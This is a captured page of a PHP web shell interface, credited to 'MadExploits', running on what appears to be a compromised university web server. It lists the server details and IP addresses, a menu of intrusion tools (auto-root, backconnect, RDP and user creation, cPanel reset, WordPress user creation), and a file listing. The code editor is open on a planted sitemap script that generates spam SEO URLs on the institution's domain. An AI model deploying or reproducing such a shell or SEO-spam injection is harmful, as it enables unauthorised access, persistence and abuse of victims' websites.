Windows NT DESKTOP-F6O892L 6.2 build 9200 (Windows 8 Professional Edition) i586
Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.19
: 10.220.0.88 | : 216.73.216.146
Cant Read [ /etc/named.conf ]
5.6.19
SC-SRV
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
[ D ]
[ E ]
D: /
xampp /
htdocs /
smartcampus /
data /
th /
video /
[ HOME SHELL ]
Name
Size
Permission
Action
404.php
6.49
KB
-rw-rw-rw-
google5254a9ef80579ec9.html
53
B
-rw-rw-rw-
index.php
636.99
KB
-rw-rw-rw-
listnew.txt
1.02
MB
-rw-rw-rw-
robots.txt
103
B
-rw-rw-rw-
sitemap.php
840
B
-rw-rw-rw-
sitemap.xml
4.58
MB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sitemap.php
<?php header("Content-Type: text/xml"); // Ubah brand_list.txt sesuai dengan file list anda $brandList = file("listnew.txt", FILE_IGNORE_NEW_LINES); $sitemap = '<?xml version="1.0" encoding="UTF-8"?>' . PHP_EOL; $sitemap .= '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . PHP_EOL; foreach ($brandList as $brand) { $url = "https://sc.syekhnurjati.ac.id/smartcampus/data/th/video/?bkk=$brand"; $sitemap .= '<url>' . PHP_EOL; $sitemap .= '<loc>' . $url . '</loc>' . PHP_EOL; $sitemap .= '<lastmod>' . date('c', time()) . '</lastmod>' . PHP_EOL; $sitemap .= '<priority>0.8</priority>' . PHP_EOL; $sitemap .= '</url>' . PHP_EOL; } $sitemap .= '</urlset>' . PHP_EOL; // Simpan sitemap sebagai file sitemap.xml file_put_contents('sitemap.xml', $sitemap); echo $sitemap; ?>
Close